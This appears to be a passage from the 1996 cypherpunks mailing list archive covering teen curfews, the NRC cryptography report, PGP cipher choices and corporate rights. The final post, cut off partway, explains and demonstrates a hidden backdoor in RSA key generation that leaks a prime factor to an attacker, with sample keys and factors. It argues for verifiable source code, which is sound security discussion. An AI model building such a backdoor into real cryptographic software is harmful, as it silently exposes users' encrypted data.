>kids" would not abide by it, inasmuch as I have no kids. So I elliptically
>referred to "parents and guardians"...after all, my sister visits with her
>husband and son, and in theory I could be the guardian of this kid. And
>friends bring their kids.
>
>My point is to send a "warning" to the Sheriff's office that at least some
>households think this crackdown on the movements of children is
>unacceptable. Children have the right to travel, especially as the parents
>permit it, without being stopped, questioned, forced to state their
>destinations, and, if the answers don't satisfy the cop, taken into
>detention at some children's equivalent of a "drunk tank."
>
>(Some purists claim that children are exempted from normal constitutional
>protections, such as the right of free association, the right to be free
>from unwarranted searches and seizures, the right of free speech, etc.
>Especially this comes up in debates about rights in public schools (speech,
>locker searches, movements are controlled, etc.). But I think a public
>school environment is a dramatically different situation, whatever one
>thinks of these claims about rights, from a kid walking on a public street.
>To claim that such a child may be stopped, interrogated, taken to a
>detention center, without a crime having been committed, is a clear
>violation of his or her rights.)
>
>As I said, should such curfews become widespread, children will of course
>need forms of age identification, and this opens yet another door for
>universal I.D. cards. And for "travel papers."
>
>Maybe it would be easier to just put a tattoo on their arms--especially as
>the younger generation is so into tattoos these days. "Pappieren, bitte.
>Macht schnell!"
>
>Here's what I sent in to scruz.general tonight:
>
>
>So Santa Cruz begins its own fascist crackdown on the free movements of
>persons. The "curfew" begins Saturday night.
>
>Allegedly these persons are children, but it is up to parents and
>guardians to control the movements of their children or charges in public
>places, NOT the function of the police to detain these children or
>charges. (Initially a "warning," but the child's name is recorded in
>police data bases....if the child is detained a second time, he or she may
>face detention time, community service, fines on the parents or guardians,
>and so forth.)
>
>ANNOUNCEMENT: I am responsible for the children in my household or in my
>custody or guardianship. Not the cops. Not the Sheriff. Not the CAMP
>helicopters. Not the narcs. Not the vice squad. Not anyone but me.
>
>I am instructing those in my household or who visit to IGNORE all
>interrogations by cops. I am telling them not to let the cops search their
>bags, not to let the cops ask where they are going, not to let the cops
>demand that they give a reason for being out. If they pick up people from
>my household, I expect the children to remain silent and to just fill up
>the god-damned jail cells until I eventually raise a ruckus and (maybe)
>pick them up.
>
>If some kids are out and about and making mischief, the cops should
>concentrate on catching _those_ children! Don't immobilize all kids  for
>the sake of supposedly cutting down on the activities of the perps. As
>with so many do-gooder laws, the effect will largely be felt on the "good"
>kids and will be ignored or evaded by the "bad" kids.
>
>As to the claims that children have no valid reason to be out after 9, or
>11, or whatever, this is not for anyone but the parents and guardians to
>decide. The god-damned cops are not the ones to decide what a valid reason
>for being out is.
>
>(I have heard that "religious worship," a la "Midnight Mass," is one of
>the valid reasons for a child to be out after curfew. Fine, religion is
>then the stated reason those in my household are out! I will tell them to
>tell any nosy cops or Sheriff's Deputies that they are worshippers of
>Baal, and Baal requires them to be out to appreciate the darkness. If the
>cops claim this is "not a valid religion," I will recite to them the First
>Amendment of the U.S. Constitution, where it says: "Congress shall make no
>law respecting the establishment of religion or prohibiting the free
>exercise thereof.")
>
>I moved to the rural part of Santa Cruz, Corralitos, to escape this
>fascist and socialist nonsense, and now I find it primarily the
>Sheriff-dominated parts of this county which will now claim to tell
>parents and guardians they no longer control their children.
>
>Fuck this.
>
>--Tim May
>
>--
>Boycott "Big Brother Inside" software!
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>

Timothy, 

For the first time in my life I agree with you. I am 13 and the cop here a
assholes. I have been caught about 13 times, yelled at me called my parents
who could give a rat's ass. I feel spend tax payer's money on more cops to
catch the bastard who kill people, not on the kids who just like to take a
walk with my girlfriend. Or when I'm going to the corner store to buy a
6-pack. A 6-pack of coke. Well as the old saying goes, fuck this and
everything that has to do with it!!!!!!!!   
          
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage     Gaa- 3.69
<jwilk@iglou.com>         Record- 2-4-4
Age- 13                   Final Standings- 2nd Place (Beat in Championship)
President & Founder:                   
Revolution Software       "I have the fastest glove in the east!"
Profanity Software        "Hackers never stop hacking they just get caught"
VSoft

My life- Rarely eat or sleep, Hack til' 7:00a, goto school, play goalie
til' 5:00p, hack til' 7:00a
Hank Aaron- d:-)!-<   Pope- +<:-)   Santa Claus- *<:-) Yo Mama- :-0

Current Girlfriend(s)- Lindsey Wilcox, Laura Schubring
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 2 Jun 1996 04:02:21 +0800
To: cypherpunks@toad.com
Subject: Re: opinions on book "The Truth Machine"
Message-ID: <add5bca103021004314e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 6/1/96, Adam Back wrote:
>Tim May <tcmay@got.net> wrote:
>> At 7:06 AM 5/31/96, Timothy C. May wrote:
>> >It sounds like a "make.money.fast.by.promoting.this.book" scam to me.
>
>If you mean myself, this had not occured to me and I assure you I have
>no connections with the author, and no interest in promoting sales of
>his book.

No, Adam, I certainly was not implying you are profiting from this in any
way. Maybe the "make.money.fast" description was a poor one...what I meant
to imply is that the book is being advertised widely (I've seen half a
dozen announcements of it), and it reminds me of either the Craig Shergold
or make.money.fast posts, not sure which.

>The writing style wasn't great, and I'd agree there were plenty of
>flaws, but what I was interested in was cypherpunks opinions on the
>technology, rather than the quality of the book, or making money for

The main technology, "the truth machine," is so bogus as to be boring.

>The interesting technologies touched on were:
>
>- cheap video used by everyone to record their own lives

A better treatment of this is in David Brin's "Earth."

>That government might have a go at mandating a "voluntary" video
>survielance set up doesn't seem that unrealistic in the current
>political climate.  Having just read your post on curfews my response
>was what the fuck, are you serious?  It totally amazes me that public
>opinion has got to the stage that something like this would be
>accepted.  Sounds like a military dictatorship.  Children first,
>adults next?  The level of peoples paranoia about reducing crime at
>any cost has been severely underestimated.  Surely that's way out of
>line constitutionally?

We agree. I once jokingly wrote a post about "position escrow," and I now
fear it is not so far off. ("The Positional Update Tracking Zoner (PUTZ)
meets law enforcement's legitimate needs, with proper court authority, to
track the movements of citizen-units.")

However, what you say below about being required to explain your movements
to cops who stop you on the highway and then present "papers" to them
within one week is truly horrifying, far beyond anything we yet have here
in these beknighted states:

>For instance I have been stopped by the police four times late at
>night driving home, as I live some distance from the university.  The
>questions are basically what is your business (ie what are you doing
>so late at night), and then they get you to take in your papers to the
>police station within 1 week which is an inconvenience.  Also the
...

!!!

Glad I don't live in Britain.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 2 Jun 1996 04:24:31 +0800
To: cypherpunks@toad.com
Subject: Re: Optimism re NRC Cryptography Report
Message-ID: <199606011703.KAA10297@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07.40 AM 5/31/96 -0700, tcmay@got.net wrote:

>Unless laws are passed very quickly to outlaw the things we are involved
>with, including such things as superencryption, steganography, anonymous
>remailers, and digital money, I think we will "win the race to the fork in
>the road." The "fork in the road" being the point at which the changes are
>unstoppable.

How fast is very quickly?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 1 Jun 1996 21:45:36 +0800
To: cypherpunks@toad.com
Subject: NYT on NRC Report
Message-ID: <199606011049.KAA14185@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, May 31, 1996, p. D2. 
 
 
   White House Challenged on Data Security 
 
   By John Markoff 
 
 
   The United States Government should immediately relax 
   export controls on electronic data coding products and 
   allow the computer, software and telecommunications 
   industries to set data security standards, a new report 
   urged yesterday. 
 
   The report, commissioned by Congress and prepared for the 
   National Research Council of the National Academy of 
   Sciences, stands in direct opposition to existing Clinton 
   Administration proposals for data security standards and 
   for linking the relaxation of export controls to the 
   adoption of such standards. The report calls for the 
   widespread commercial adoption of technologies used to 
   prevent illegal wiretapping of computer data, telephone, 
   cellular and other wireless communications. The National 
   Research Council provides science and technology advice 
   under a Congressional charter. 
 
   The report also states that despite creating potential 
   problems for law enforcement agencies by making it easier 
   for criminals to shield their communications from 
   Government wiretappers, cryptography would also help 
   prevent crime by sheltering communications and electronic 
   transactions from the prying eyes of electronic 
   interlopers. 
 
   "Without information security, computer crime in this 
   country will rise very rapidly," said Kenneth W. Dam, the 
   chairman of the panel that prepared the report. Mr. Dam, 
   Deputy Secretary of State during the Reagan Administration, 
   is also professor of American and foreign law at the 
   University of Chicago. 
 
   The report, industry executives said, is likely to become 
   a key weapon in the battle between the Federal Government 
   and industry and civil liberties groups. 
 
   "It echoes things we have been saying for some time," said 
   Jim Bidzos, chief executive of RSA Data Security Inc., a 
   developer of computer security software. "The next 
   battleground is going to be Capitol Hill because the 
   Administration isn't going to give up easily." 
 
   In particular, the report takes issue with Administration 
   efforts to force the use of data-scrambling systems using 
   "escrowed" keys that would let law enforcement and 
   intelligence agencies use built-in backdoors to read coded 
   information. 
 
   Cryptography, once used only by spies and the military, has 
   become an increasingly vital technology for insuring 
   security in electronic commerce and personal privacy. It 
   relies on the use of mathematical formulas to scramble 
   electronic information so that it cannot be read without 
   the proper digital "key." 
 
   Key escrow systems like those proposed by the 
   Administration in its Clipper chip program would split the 
   key and have trusted third parties like the Treasury 
   Department hold parts of it, making it possible for law 
   enforcement agencies to generate keys without consulting 
   the sources of the data. 
 
   As recently as two weeks ago, the Administration was 
   pushing for key escrow coding approaches to data 
   scrambling. A draft White.House policy paper has proposed 
   linking relaxation of export controls to systems that 
   included key escrowing. The recent paper also indicated 
   that the Government was willing to accept "self-escrow" 
   systems for some large corporations that would allow them 
   to to hold all parts of the keys. 
 
   Critics of key escrow management technology note that it 
   can be abused by agencies that wish to exceed their 
   surveillance authority and that the technology is 
   vulnerable to a single point of failure. If a so-called 
   master key is stolen, they say, the entire coding system 
   can be compromised. 
 
   Because strong cryptography would complicate the mission of 
   United States intelligence agencies, the Federal Government 
   currently places tight controls on the export of software 
   and hardware that offer stronger cryptographic protection 
   than 40-bit keys. Such keys are made up of a binary number 
   that is 40 digits long. Computer experts have shown that 
   40-bit keys are vulnerable to attacks. 
 
   The report released yesterday, "Cryptography's Role in 
   Securing the Information Society," calls for dropping stiff 
   export controls on products that use the Data Encryption 
   Standard, which relies on a 56-bit key and offers stronger 
   protection against computerized attacks than a 40-bit key. 
 
   [End] 
 
 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watson@tds.com
Date: Sun, 2 Jun 1996 05:28:32 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
In-Reply-To: <199605302304.QAA14424@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.960601105449.3487C-100000@mailman.tds.com>
MIME-Version: 1.0
Content-Type: text/plain


Anybody know who the NRC is and whether they have any influence with anyone?

Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 1 Jun 1996 21:10:52 +0800
To: Cypherpunks@toad.com
Subject: Find Article.  (Hack China?!?)
Message-ID: <199606011027.MAA29937@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Posted in alt.privacy.....

In article <4oo7dj$3am@sunrise.pku.edu.cn>
deezxl@sunstation2.tsinghua.edu.cn (HOME_Xuelong Zhu) writes:
From: deezxl@sunstation2.tsinghua.edu.cn (HOME_Xuelong Zhu)
Subject: Find Article.
Date: 1 Jun 1996 01:46:27 GMT

Please tell me where I can find the WWW site or FTP site with many articles
(thesis,all kinds of paper,etc) about date security and cryptology.

please send your answer to deezxl@tsinghua.edu.cn
Thank you very much. 

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 1 Jun 1996 23:30:23 +0800
To: tcmay@got.net
Subject: Re: opinions on book "The Truth Machine"
In-Reply-To: <add49ffc03021004e128@[205.199.118.202]>
Message-ID: <199606011153.MAA00654@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> wrote:
> At 7:06 AM 5/31/96, Timothy C. May wrote:
> >It sounds like a "make.money.fast.by.promoting.this.book" scam to me.

If you mean myself, this had not occured to me and I assure you I have
no connections with the author, and no interest in promoting sales of
his book.

There is no charge to read the book on line -- and I for one wouldn't
buy a paper book I have electronic copy for.  I saw the URL posted (by
the author of the book judging by the From line) in
talk.politics.crypto and read it on line.

The only "charge" for reading is to fill in short questionaires as you
read.

> It was truly bad stuff. Terribly written, confusing no character
> development except in a cartoonish way.

The writing style wasn't great, and I'd agree there were plenty of
flaws, but what I was interested in was cypherpunks opinions on the
technology, rather than the quality of the book, or making money for
the author!  This was my reason for making the post to cypherpunks.
Admitedly it was 5am when I made the post (having just finished
reading said book) and I didn't explain myself... lets try again:

The interesting technologies touched on were:

- cheap video used by everyone to record their own lives

This has been talked about in cyperpunks in the past, and from that
discussion I seem to remember that there was talk of a trial with
police in some area of the US wearing mini-cams to protect them from
claims of police brutality.

- the book has video streams transmitted in real time to some database
(state run? I'm not sure it was clear, also no mention of encryption).

If it was an option to have video stored in the device itself
encrypted or transmitted to a data haven encrypted, I don't see
anything wrong with that so long as it's voluntary and nothing to do
with government.

That government might have a go at mandating a "voluntary" video
survielance set up doesn't seem that unrealistic in the current
political climate.  Having just read your post on curfews my response
was what the fuck, are you serious?  It totally amazes me that public
opinion has got to the stage that something like this would be
accepted.  Sounds like a military dictatorship.  Children first,
adults next?  The level of peoples paranoia about reducing crime at
any cost has been severely underestimated.  Surely that's way out of
line constitutionally?

The price and the storage technology for a tamper resistant storage
device linked to a CCD at cheap commodity price hasn't quite come
about yet.  When it gets cheap enough, I think this could become
called for -- children first perhaps as the curfew.  Random police
searches asking you what your business is.

- wide use of accurate lie detectors

the book has everyone wearing a wrist communicator / lie detector /
video recorder.  If someone wants to walk around with a light that
will flash if they tell a lie, again that's there problem.  It would
be kind of fun to see politicians required to wearing one.  But as
Sandy pointed out the `national security' and the need to lie to the
people for the benefit of the people might be bought up as a reason to
defend dishonest politicians.

the book talks about 100% accurate lie detectors with no
qualifications which is obviously nonsense, I'm not sure what success
current lie detectors have, but there would no doubt be lots of
problems.  People are able to fool current lie detectors, and as I
understand it the detectors look for subtle physical signs of
distress, changes in skin conductivity caused by distress, and some
are able to lie without suffering any distress.  It seems reasonable
that use of a wider range of sensory devices as input, and more
sophisticated analysis of the signals could improve on reliability of
the current lie detectors.

Interesting questions arise if they become accurate enough that they
can be used to supplement or even replace much of the legal system.
The state mandated requirement of people to routinely submit to lie
detector tests is of course totally unacceptable, but if you get to
the stage of having curfews (still amazed at that) and the police are
legally allowed to ask you to submit to a lie detector test asking a
few more questions during the random spot check seems likely.

For instance I have been stopped by the police four times late at
night driving home, as I live some distance from the university.  The
questions are basically what is your business (ie what are you doing
so late at night), and then they get you to take in your papers to the
police station within 1 week which is an inconvenience.  Also the
practice over here seems to be to do a spot check on the state of the
vehicle, quick visual inspection of the tires with flashlight, check
on the lights, do they all work -- dip / full, indicate.  Also at the
same time they ask for ID.  On one of the occasions the officer asked
what an object inside the car was (it was on the floor beteen the seat
and the door well and visible with the door open) -- a wheel wrench (2
foot wrench and socket), I said it was a wheel wrench, and he made a
comment that he had thought it was something to hit someone with.
Jeez.  It would have been a pretty good object to hit someone with as
far as that goes, but it has also proved a remarkably useful object
for changing a flat tyre.

I'm not sure where I would stand on this legally, but I have so far
resisted the temptation to tell them it's none of their business.

While we're on the topic of the increase in the police state
mentality: in the UK recently as the result of some nut shooting up a
school, gun laws are due to get stricter yet.  They are I think
talking about making it law that all target pistols must be kept at
the gun club (whereas currently you can take them home to clean (but
not shoot)).

Also they are actually talking about restricting the sale of replica
guns.  What'll they do now recall childrens toys which are too
realistic?  Idiots.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 2 Jun 1996 04:59:16 +0800
To: Chris Adams <adamsc@io-online.com>
Subject: Re: Ok, what about PGP (was: MD5 collisions)
In-Reply-To: <199606010433.VAA21006@toad.com>
Message-ID: <Pine.LNX.3.93.960601133031.291A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 30 May 1996, Chris Adams wrote:

> On 29 May 1996 19:03:04 pdt, wlkngowl@unix.asb.com wrote:
> 
> >I poked around the pgp.h and pgformat.txt files in the PGP 2.6.2
> >distribution.  There *are* designator bytes for the hash (and cipher)
> >algorithms, hash size, etc.
> >
> >It seems quite doable to add support for SHA-1 signatures (and possibly key
> >generation for encrypting secret keys?).
> >
> >Adding 3DES (and maybe Luby-Rackoff-SHA, assuming it hasn't been cracked
> >recently at the Fast Software Conf.... more info?!?) would be nifty too...
> >unless, of course, there's meaning to the Real Soon Now that PGP3 folx
> >claim.
> 
> How about a NSA-stomper option that would use all-of-the-above? For the truly
> paranoid (or 
> owners of Pentium-Pro 200Mhz multi-processor machines

Using 3DES and SHA does not decrease speed that much (it may even be faster).
Both of them are very secure algorithms.

> 
> Also, what's the verdict on IDEA? Is there a switch yet that would allow straight RSA? 
> (with the obvious speed decrease...)

Why would you want to use straight RSA?  IDEA is as strong as a 3000-bit RSA
modulus.  So far, the only known way to crack IDEA is to brute-force the key
space.  RSA relies on the fact that it is assumed to be difficult to factor
large numbers.  If an efficient way is discovered to factor very large moduli,
then RSA is basically worthless.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMbB/n7Zc+sv5siulAQHJuQP/dxToToctPbfjBQE7j1sjO214kVK9TtLX
9mwRuoDppxVhMPATr3k7tdlw+COFPOQZgf0bog+RpCW+iTjlmug6tr56rkTRdUod
AJ0mR11MfQ6yNasPz81WxQracdc48ZXBFEaZYBKFCZRVAoK434dVM3slBtNVCvOn
znHMlt+W9yU=
=fvbq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 2 Jun 1996 08:05:20 +0800
To: cypherpunks@toad.com
Subject: Re: Fairness, Justice, and Cypherpunks (fwd)
Message-ID: <add5fbe8040210040f04@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 PM 6/1/96, Jim Choate wrote:

>Businesses (and government) have no rights under the Constitution and should
>enjoy no rights under the Constitution. Rights are the sole purvue of real live
>human beings (ie individuals) and not groups or paper individuals (stupidest
>idea I have ever seen in the legal field). It is not reasonable to support

This may come as a surprise to newspapers, which are corporations for the
most part, and other publishing companies. Here we thought the First
Amendment covered them.

Apparently not. The government of the U.S. may freely tell "Time" magazine
what to right, may tell "Wired" what official slant to put on a story, and
what images "Playboy" may not publish.

Oh, and the various religious institutions are clearly not covered, either,
as they are groups. While _individuals_ are free to worship as they please,
they'd better not form a church or synagogue, lest the government give them
instructions on what to do.

And the Fourth Amendment and other amendments don't cover small businesses,
large corporations, etc., so the cops are perfectly free to knock the doors
down, enter whenever they wish, force companies to quarter troops, seize
property without due process,....

Is this what you're saying is the case, or is this what you want to be the case?

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 2 Jun 1996 06:07:37 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: I told you so
In-Reply-To: <Pine.SUN.3.93.960601183545.5168D-100000@scorpio.gold.ac.uk>
Message-ID: <199606011803.OAA17188@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I did NOT write what you are attributing to me. I was quoting someone else. 

Please be more careful with your attributions.

.pm

Sean Gabb writes:
> On Fri, 31 May 1996, Perry E. Metzger wrote:
> 
> > 
> > I retract the following story, it was told to me by a contractor 
> > who attended a MBONE group meeting on the MBONE, where the story 
> > originated:
> > 
> 
> I'm greatly heartened by retractions.  Anyone who retracts so promptly
> shows a commitment to truth that I admire - and that also inclines me to
> believe whatever that person does not retract.  I wish it were a more
> common thing.
> 
> Sean Gabb.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 2 Jun 1996 06:01:08 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <199606011838.OAA21114@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 31 May 96 at 19:08, Timothy C. May wrote:

> This is off-topic for the list, but I want to share it anyway. It touches
> on issues of increasing police surveillance, and also touches on the issue

Not really too off topic at all, considering the surveillance state 
and GAK relate very much to what we're doing here.

An aside: at the University I used to attend, there were field trips 
to this small museum on the campus by elementary school children, who 
apparently regarded the motion detectors for the automatic doors as 
being cameras which they'd happily wave hello to.  Images of Huxley's 
Brave New World intermingled with Warhol's 15-minutes-of-fame stewed 
up with Orwell here....

> of "age credentials" (in the sense that how else is a cop who stops a young
> person for "curfew violation" to determine if a violation has occurred when
> most 14- and 15-year-olds carry no driver's licenses?)

Since when are we now to carry ID everywhere. And of course the local 
police will (as usual) be selective about who they stop to ask about 
directions.

Also note that a reasonable exception will be for kids to go to work 
or school-related activities (institutional), but nothing 
non-institutional such as a party at a friend's house (drugs or no 
drugs), band practice, etc. etc.

> The "curfew" meme is spreading quickly, with Clinton calling for a federal
> curfew, at least in cities, and Dole trying to outdo him with even more
> draconian curfew laws. Many communities already have them, including San
> Jose, New Orleans, and other large cities. And my own community, Santa Cruz
> County, ironically begins a curfew program on Saturday, tomorrow.

Some communities here in Long Island have them. Others have fought 
them, and I think a couple of attempts were struck down by courts. 
Also a blurb in the local papers about police not wanting the curfew 
here, believing it to be a waste of their time or unnecessary... 
(I'll have to dig the article up; I only rememebr it wasn't 
reassuring.)

[..]
> (Some purists claim that children are exempted from normal constitutional
> protections, such as the right of free association, the right to be free
> from unwarranted searches and seizures, the right of free speech, etc.
> Especially this comes up in debates about rights in public schools (speech,
> locker searches, movements are controlled, etc.). But I think a public

A problem indeed. Children grow up used to the surveillance society 
and don't mind it when they become adults.  Imagine a whole 
generation coming of age being told they are "criminals".  Things 
will be very "interesting" (in the Chinese fortune cookie sense) 
during the next 10-20 years...

> As I said, should such curfews become widespread, children will of course
> need forms of age identification, and this opens yet another door for
> universal I.D. cards. And for "travel papers."

...or they'll stay at home and net surf.  Beware the Four (or six?) 
Horsemen...

Rob.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 1 Jun 1996 23:29:33 +0800
To: cypherpunks@toad.com
Subject: Re: Backdoor in RSA Discovered
Message-ID: <199606011216.OAA15537@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Here is an example of a PGP key that has been generated, but with
a secret backdoor.  It is not possible by looking at the generated
key to see that it has a backdoor.

The key generation code contains Mallets public key.  When generating
a key, the upper bytes of N are set to an encrypted factor of N.
The encryption is done using Mallets public key, so only Mallet
can retrieve the factor from N.

I think this example demonstrates the need not only for having key
generation source code (which is required anyway in order to verify
the quality of the random number generator), but also for being able
to compile and link this source, since without this ability it is too
easy to have such a backdoor in the system  (yes, the code could be
reversed engineered, but this can be made very difficult by having
self modifying code etc.)

There does however appear to be one way to assure the user that
this trickery is not going on.  This can be done by generating
"vanity keys", that allow the user to specify a phrase that
will appear in the PGP ascii key.  If this were done, then there
would be little room left in N to store details about its factors.


Here is a working example of this backdoor:



This is Mallets secret key (passphrase "xyzzy"):

	Type bits/keyID    Date        User ID
	sec   496/5D925633 1996/06/01  Bill Klinton <bill@whitehouse.gov>
	-----BEGIN PGP SECRET KEY BLOCK-----
	Version: 2.6.2
	
	lQD5AjGwJnsAAAEB8M6FnxIdQZrORfKlb6/l74S6YUT0GQHvzrioiXJoRd2gnAAs
	e99C/XPKZShiylm+nu5UD8zDBBtcoiBdklYzAAURAQxi1EDMl1u+Aew7e7bKTY6c
	l/RAUacgZ9zbL1tl96kxQucLrt8l6Sz11EOmnV9eDZdf1LYG9jg5WbLvNGqpmzyY
	PlNKBJn/7gD4hu3YUt9caDyY5/X2ASMaL40gb1y1YZxjbTbB4Xjd8wD4+Iv9qhEQ
	fLjeYi+iUhnNkMtPyeg/+TR6rdP/c42UXAD2mqW0VuM8wiib0nbwfXwC0SlJveLG
	UwNOgRIujTwS7k35tCJCaWxsIEtsaW50b24gPGJpbGxAd2hpdGVob3VzZS5nb3Y+
	=oOrI
	-----END PGP SECRET KEY BLOCK-----

The key consists of the following:

	n:	ce859f121d419ace45f2a56fafe5ef84ba6144f41901efceb8a889726845dd
		a09c002c7bdf42fd73ca652862ca59be9eee540fccc3041b5ca2205d925633
	e:	11
	d:	0c25fa4c5c12eafd132c6415a0ef68713823d6e12ea5c2cfecbe9eac607c94
		75d1b60c2a3aef89438692326d70d88080317b0cd04432d5a0230de572e819
	p:	d2640ede17e8c05545aa9ecfd5154f934021e4ef8ef22a248abe0ab3f1aaed
	q:	fb4ada7f960c9a8ab23010ff4936a9a2db834346694979c72f90296cff419f



This is Joe's PGP key (passphrase is "xyzzy"):

	Type bits/keyID    Date        User ID
	sec  1024/D0351D23 1996/06/01  Joe Sixpack <joe@aol.com>
	-----BEGIN PGP SECRET KEY BLOCK-----
	Version: 2.6.2

	lQHgAjGwKUIAAAEEAIBG2pH3rabYMSWhVjcnG8v9HVU4vwtBuBysnvuJI4PvjV3o
	+YnuFD+x3aF8O52jgpBTllAxhndDSPUXQaj+sXEGDkV0Nq8RCZ02usaj24ogn0+S
	KW9ej8GgWL8EmlP1H1Qrv39/qz1VSqvxczCLYoRetHETR0JirwcMj9fQNR0jAAUR
	AYwvF+QHqifbA/4oAli05pLm0QlkbOqimdm4QS3OC1r9kdqvO88GF5nj9EgLm1a+
	svRThXiO586Udi1UkSXvM60o4nz6tGASavgc7X8JaL/B2yOcMH9gF6CN6zabiyAb
	anrJe06IuKH3980GoQ2Sp1sssFHqxgper1ga3STmUVj/dQBjaFUI1qwDkwIAnRPO
	F7qIopIcEhnxW1OXcv0/9Afhugy3ERbGZwTaaw2fAiiyD41FpkbOUbao8D5Vkndr
	y6h2LEC7P5iwfdAF3AIAPz/2nRuZAnyNrA4ESvryyHMejwsz9BAkok+MT2z2E85W
	h8laL76yok5DZz56bRqH2gyQkPR5Rx3hnLx+fqL45gIAzy3CkdR77yw8bXUH8/Av
	azYh0m4KzEsw8P1a10YkVxP8xiTbqYbN0lmzOrdWlEW6dZjkx5q67vt1op7hDtqW
	LJwYtBlKb2UgU2l4cGFjayA8am9lQGFvbC5jb20+
	=evl9
	-----END PGP SECRET KEY BLOCK-----

The key consists of the following:

	n:	8046da91f7ada6d83125a15637271bcbfd1d5538bf0b41b81cac9efb89
		2383ef8d5de8f989ee143fb1dda17c3b9da382905396503186774348f5
		1741a8feb171060e457436af11099d36bac6a3db8a209f4f92296f5e8f
		c1a058bf049a53f51f542bbf7f7fab3d554aabf173308b62845eb47113
		474262af070c8fd7d0351d23
	e:	11
	d:	2d462f06576a771f2067a25aaa0dcd934a46968c7fa99eb97388381c8a
		c13d9fd78a8e7630ae617fe46c571cc9bf2aa68d4aad85b7206653fba1
		cbf90e78026398a33f3a99dd4ced780f9bd854b2560f5cd9c6113ab837
		7443d9e946a3c2c74989f26f775635cd6ebd8a665e0885e28c60d714b3
		c9981c0ff09fa561a7d7d8f1
	p:	804e00dc8ea1c0a55c2f5a5b14fdb05f84ecb1c5d1463562925637624e
		6f1d945adbc4ed2cb4dd266f8f9c59f6c07d7b3d3ee20328bfdf12f54f
		654256a63e01
	q:	fff1bc1c496fa118c2307c31498f3b403df9d9dd77b91295a3191d5a26
		924d8ff276696adeb344ca6cbeddb976fa387b64697f12b8a8dec43d4e
		2b561e00a323

If we look at bytes 1-63 of n:

